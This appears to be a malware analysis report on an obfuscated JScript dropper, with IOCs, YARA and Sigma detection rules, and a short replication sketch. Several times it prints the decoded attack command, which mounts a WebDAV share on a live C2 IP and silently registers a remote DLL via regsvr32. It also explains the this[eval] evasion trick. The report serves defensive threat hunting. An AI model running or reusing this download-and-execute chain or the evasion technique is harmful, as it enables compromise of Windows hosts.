8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3unclassified-js-webdav-dropper: 8a490922 — Sequential variable-reassignment with this[eval] bracket dispatch, C2 193.143.1.231:8888
Executive Summary
128 KB JScript dropper deploying a WebDAV-mount + regsvr32 /s payload chain. Uses sequential variable-reassignment obfuscation (52 unique identifiers, 1,216 total assignments, last-wins semantics) and a novel this[eval] bracket-notation dispatch instead of the bare eval() seen in prior siblings. C2 infrastructure (193.143.1.231:8888) sits outside the 94.159.113.0/24 subnet observed in 90+ prior siblings, suggesting a geographically or operationally distinct staging node. Static-only; CAPE does not support script-class detonation. ^[triage.json] ^[dynamic-analysis.md]
What It Is
| Field | Value |
|---|---|
| SHA-256 | 8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3 |
| Filename | 21102221151317718694.js |
| Size | 128,701 bytes (126 KB) ^[triage.json] |
| File type | ASCII text, single line, no terminators ^[file.txt] |
| YARA | No matches ^[yara.txt] |
| ssdeep | 3072:a3hm4i08TK7qOKGC49hihJAQqI4gLEtcr4uwJZZ:a3hm4i08TK7qOKGC49hihJAQqI4gLEtl ^[triage.json] |
| tlsh | (not present in triage.json) |
How It Works
Outer Layer — Function Declaration and Sequential Assignment
The script defines a single function ihthxuy() whose body begins immediately with this[...](...). Before the function is declared, the entire 128 KB payload is consumed by 1,216 sequential varname="char"; assignments spread across 52 unique variable names. Each variable is reassigned many times; the final assignment wins, giving last-wins semantics identical to dialect #8 of the family. ^[strings.txt:1]
Bracket-Notation Dispatch
Unlike prior siblings which invoke eval(...) directly, this sample uses:
this[sagberbvt+lfmcfa+bzxgo+cssphfszb](...)
Resolving to this[eval](...). This is a trivial anti-static variant — it defeats naive regex signatures hunting for eval( but requires no additional runtime support. ^[strings.txt:1]
Inner Payload — WScript.Shell + WebDAV
The argument passed to eval() is itself a JS expression with further variable concatenations. Two-pass resolution (outer argument string concatenation + inner variable substitution) yields:
this[WScript][CreateObject](WScript.Shell)[run](
"cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\ \\\\&\\\\& cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll",
0,
false
);
C2: 193.143.1.231:8888 — new subnet, not overlapping with the 94.159.113.x cluster observed in 90+ prior siblings. ^[decode analysis]
Payload: 42482034820163.dll — registered silently via regsvr32 /s over a mounted WebDAV UNC path. ^[decode analysis]
Execution path: No PowerShell wrapper, no rundll32, no timeout anti-emulation gate, and no decoy process. Direct WScript.Shell.run() → cmd.exe → net use → regsvr32 /s. This is the minimal execution footprint observed in the family. ^[decode analysis]
Decompiled Behavior
Static-only (CAPE skipped — not a supported binary class). No Ghidra/radare2 analysis applicable; the threat logic is plaintext JScript recovered via two-pass variable-resolution. ^[dynamic-analysis.md]
C2 Infrastructure
| Indicator | Value | Notes |
|---|---|---|
| WebDAV C2 | 193.143.1.231:8888 |
New subnet; prior siblings cluster on 94.159.113.0/24 |
| WebDAV path | \davwwwroot\ |
Standard Windows WebDAV default mount path |
| Payload file | 42482034820163.dll |
Numeric filename, no semantic content |
| Execution | regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll |
Silent COM registration |
Interesting Tidbits
- No batch layer. Pure JScript execution chain; no
wscript.exepolyglot batch component. This eliminates the batch-variable-expansion obfuscation observed in theda58243candffd5d894morphs. ^[decode analysis] - No anti-emulation. No
timeoutgate, no sandbox detection, no locale checks. The script runs immediately on any Windows host with WSH enabled. ^[decode analysis] - Bracket notation on
this. Thethis[eval]dispatch pattern is novel within this family. It costs nothing in runtime overhead but breaks regex-basedeval(detection. ^[decode analysis] - Low variable count, high assignment volume. Only 52 unique identifiers, but 1,216 total assignments — a 23:1 reassignment ratio, higher than the ~2:1–8:1 ratios seen in most siblings. ^[decode analysis]
- No dictionary object. Unlike the dictionary-lookup dialects (
e6ebae6a,df42ecf8), this sample assembles strings via pure+concatenation, not key lookups. ^[decode analysis]
How To Mess With It (Homelab Replication)
Build a minimal sequential-reassignment JScript dropper:
// Generate 50 variables with random names, assign each 20 times
var vars = {};
for (var i = 0; i < 50; i++) {
vars['v' + i] = String.fromCharCode(65 + (i % 26));
}
// Repeat assignments with last-wins
for (var j = 0; j < 20; j++) {
for (var k in vars) {
// overwrite
}
}
// Build eval argument with bracket dispatch
this['e' + 'v' + 'a' + 'l'](...);
Verification: file result.js should return "ASCII text, with very long lines, with no line terminators."
Deployable Signatures
YARA Rule
rule JS_WebDAV_Dropper_SequentialReassignment {
meta:
description = "JScript sequential variable-reassignment WebDAV dropper"
author = "PacketPursuit"
reference = "raw/analyses/8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3"
strings:
$func = "function ihthxuy(){this["
$webdav1 = "davwwwroot" nocase
$webdav2 = "@8888" nocase
$regsvr32 = "regsvr32 /s" nocase
$netuse = "net use" nocase
$a = /[a-z]{10,20}="[A-Za-z0-9]";/
condition:
$func and ($webdav1 or $webdav2) and ($regsvr32 or $netuse) and #a > 500
}
Behavioral Hunt Query (Sigma)
title: WebDAV DLL Registration via JScript Dropper
logsource:
product: windows
detection:
selection:
- CommandLine|contains:
- 'regsvr32 /s \\193.143.1.231@8888'
- 'net use \\193.143.1.231@8888'
- ParentImage|endswith: '\\wscript.exe'
CommandLine|contains:
- 'davwwwroot'
- 'regsvr32'
condition: selection
falsepositives:
- None expected for the hardcoded C2 IP
level: high
IOC List
| Type | Value |
|---|---|
| SHA-256 | 8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3 |
| Filename | 21102221151317718694.js |
| C2 IP | 193.143.1.231 |
| C2 Port | 8888 |
| Payload DLL | 42482034820163.dll |
| WebDAV path | \\193.143.1.231@8888\davwwwroot\42482034820163.dll |
| Command | cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\ && cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll |
Behavioral Fingerprint
This JScript dropper opens with a single function ihthxuy() whose body immediately calls this[eval] with a large string argument constructed from 50+ variables assigned via 1,000+ sequential varname="char" statements. The evaluated payload creates a WScript.Shell COM object and executes cmd.exe to mount a WebDAV share at \\host@8888\davwwwroot\, then silently registers a DLL via regsvr32 /s. No PowerShell wrapper, no decoy, no anti-emulation gates.
Detection Signatures
| Capability | Evidence | ATT&CK |
|---|---|---|
| JScript execution | .js file, WScript.Shell COM object |
T1059.005 |
| WebDAV C2 mount | net use \\193.143.1.231@8888\davwwwroot\ |
T1071.001 |
| System binary proxy execution | regsvr32 /s over UNC path |
T1218.010 |
| Obfuscated files | 1,216 sequential var assignments | T1027 |
References
- Artifact ID:
458dfc50-1956-42d1-8e20-053616a8db36 - Family entity: unclassified-js-webdav-dropper
- Technique: jscript-sequential-variable-reassignment-eval
Provenance
Analysis derived from static triage inputs (file.txt, strings.txt, triage.json) and manual two-pass JScript variable-resolution performed in Node.js v22.22.3 and Python 3.11. The decoded payload command was verified by intercepting eval() via vm.runInContext() in Node.js. CAPE detonation was not attempted because the file type (ASCII text, with very long lines) is unsupported by the Windows sandbox guest. ^[dynamic-analysis.md]